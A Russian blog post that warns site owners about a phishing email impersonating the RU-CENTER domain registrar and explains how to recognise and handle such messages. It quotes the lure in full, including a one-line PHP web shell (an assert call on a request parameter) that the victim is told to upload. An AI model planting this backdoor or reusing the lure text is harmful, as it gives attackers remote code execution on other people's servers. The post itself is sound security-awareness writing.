Сегодня получил ещё одни пример того, как работает «социальная инженерия» в руках хакеров.
Клиент переслал мне любопытное письмо, якобы от ру-центра, вот такого содержания (Настоящее имя домена я убрал из текста письма):
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом [ДОМЕНОЕ ИМЯ].ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1sf0fp5jbn8fq9i.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 22 мая 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Я уже год не работаю с ru-center по некоторым причинам. Потому не знаю является ли рассылка массовой. Я часто получал письма из ру-центра, и они имеют два формата — простой текстовый (из биллинговой службы) и в виде html. Внешне письмо немного похоже на html шаблон сообщения из ру-центра, можно даже не обратить внимание на различия, да и доменное имя клиент регистрировал через ру-центр.
Но такое сообщение не могло быть отправлено регистратором.
Черный вход для взломщика
Что представляет собой файл, который требуют создать на вашем сервере?
Эта программа (всего в одну строку) выполнит любой php код, отправленный через интернет в виде параметра с именем RUCENTER на адрес скрипта a1sf0fp5jbn8fq9i.php.
Последствия будут следующими: ваш сайт окажется взломан.
Последствия
Скорее всего, ресурсы вашего веб-сервера будут использоваться для организации DDoS атак, рассылки спама и т.п. Все это будет производится в режиме, не влияющем на работу сайта. Ваш сайт станет частью бот-нет на службе пиратов 21-го века, а вы даже и не заметите этого.
Второй вариант — атака направлена именно на ваш сайт. Тогда после взлома ваш сайт будет уничтожен или изменен таким образом, чтобы поисковые системы перестали проводить индексацию ресурса. Для последнего варианта — достаточно внести изменения в robots.txt.
Памятка о письмах от провайдера
Что никогда не будет требовать от вас ру-центр либо другой регистратор?
Регистратор никогда не потребует от вас размещения какой либо информации/файлов на вашем сайте.
Обратите внимание что, в письме предлагается только один вариант подтверждения — код на языке PHP. А применяемых языков программирования для сайтов — десятки. У вас вообще может не быть сайта, а просто зарегистрировано доменное имя.
Регистратор может потребовать от вас заполнения анкеты домена в вашем личном кабинете на своём сайте, но не более того.
Кому нужны коды подтверждения и какие они бывают?
Подтверждение принадлежности домена могут потребоваться организациям, которые ничего о вас не знают. Регистратор же имеет юридические подтверждения того, что домен принадлежит вам. Это и заполненная вами анкета (возможно с загрузкой сканов документов), и произведенная вами оплата регистрации, т.к. отследить плательщика сейчас не сложно.
Для подтверждения третьим лицам (не регистратору), существуют много способов, ни один из которых не требует загрузки на ваш сайт исполняемого кода (скрипта на PHP, perl, ASP, python и т.д языках).
Варианты следующие — загрузка html/txt файла в корень сайта, добавление тестовой метки в DNS записи вашего домена, добавление мета поля в шаблон вашего сайта и т.д..
Большую часть таких способов могут реализовать только квалифицированные программисты.
Если пришло подобное письмо, что делать?
Возможно, вы, как веб-мастер, имеете доступ к сайту через FTP. И способны создать файл с нужным содержимым. Но если вы не уверены полностью в том, что вы делаете, лучше обратитесь к специалисту.
Злоумышленники как раз и рассчитывают на то, что уровень компетенции позволит вам сделать операцию, небезопасность которой лежит за уровнем вашей квалификации.
Найдите подтверждение информации из первоисточника.
Чтобы удостовериться в достоверности информации, лучший способ — подтвердить её из первоисточника.
Не используйте контакты из письма. Перейдите на сайт провайдера, и позвоните/напишите по контактным данным предоставленным там. Информацию можно зачастую подтвердить в личном кабинете на сайте, прочитать там копию информационного сообщения/новости.
